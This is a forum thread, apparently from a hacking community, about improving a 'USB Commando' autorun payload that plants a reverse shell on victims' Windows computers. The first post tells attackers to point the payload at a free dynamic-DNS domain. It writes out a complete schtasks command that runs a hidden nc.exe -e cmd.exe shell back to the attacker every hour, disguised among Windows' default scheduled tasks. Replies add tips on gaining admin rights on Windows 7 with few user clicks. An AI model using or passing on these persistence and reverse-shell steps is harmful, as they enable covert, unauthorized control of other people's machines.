Jump to content

USB Commando Payload v3 Beta w/ Java's Method v2


sablefoxx
 Share

Recommended Posts

  • 2 months later...

So today, I randomly started messing around with this payload and I thought about a few problems that one could have when using it. First off, the way the reverse shell works is that the infected computer sends out a request to connect to the attackers computer (spawning a cmd), which is done by putting your WAN IP address in the setup.inf file and others. The problem here is that most internet users do not have a static IP address, which means when your ISP changes your IP address, the reverse shell no longer works. A fix to this is a sweet program/website I found called no-ip DUC (www.no-ip.com). What this website does is allow you to create a free domain name, and using the program they offer, it auto updates your WAN IP to the domain you registered at the website. In short, if your running the no-ip program it will check your current WAN IP and update it to your domain name accordingly. So instead of typing in your IP address in the setup.inf files, you would type your domain (plcommando.no-ip.org) (remember to not include the www.). The second flaw that I found is that when you are using this program, you have to wait for them to connect to you, which is a bitch. In some previous versions, I tried using the "at" command to schedule a reverse shell interactively every few hours, but on newer versions of windows (vista, 7) the "at" command cannot be run interactively (cant execute programs). A solution to this is to use the new "schtasks" command to schedule the tasks a hell of alot easier. Instead of having 20 different jobs to schedule when you want them to connect to you, this new command makes them all possible in 1, and can be run interactively. The command is (schtasks /create /IT /SC HOURLY /TN "TASKNAME" /TR "C:\windows\system32\hidec.exe /w nc.exe -e cmd.exe "YOUR DOMAIN" "YOUR PORT") which sends a reverse shell every hour and can be switched to minutes, seconds, etc. This way you only have 1 job hidden next to several that Microsoft has in there by default.

Thats all I got, my fingers hurt...<3 sable

Edited by javabudd
Link to comment
Share on other sites

@jen/thedadymac

The program is created so that they connect to you, regardless of a router. The reason the router doesn't matter is because we are using a reverse shell method, which has the victim send a connection request to the attacker (who has his ports forwarded on his router). If you need some help pm or somethin.

Edited by javabudd
Link to comment
Share on other sites

@javabudd, hey hit me up on Skype sometime you should help me and Pat w/ the new version of APE. I also have a basic working version of that System TaKeover which emails updates w/ IP addresses and stuff. Also we have an empty seat in our car to Defcon if you wanna tag along.

Edited by sablefoxx
Link to comment
Share on other sites

Hey guys, just joined.

Wouldn't you need admin for this? And it isn't autonomous on Win7 coz Win7 is a bitch and won't listen to an autorun.inf file D:

Yes, but all you have to do is run as admin once (can auto prompt too) and you should be able to have it run as admin every time after that without prompting the user. So basically there is two button clicks instead of none :( but not terrible.

Link to comment
Share on other sites

  • 9 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...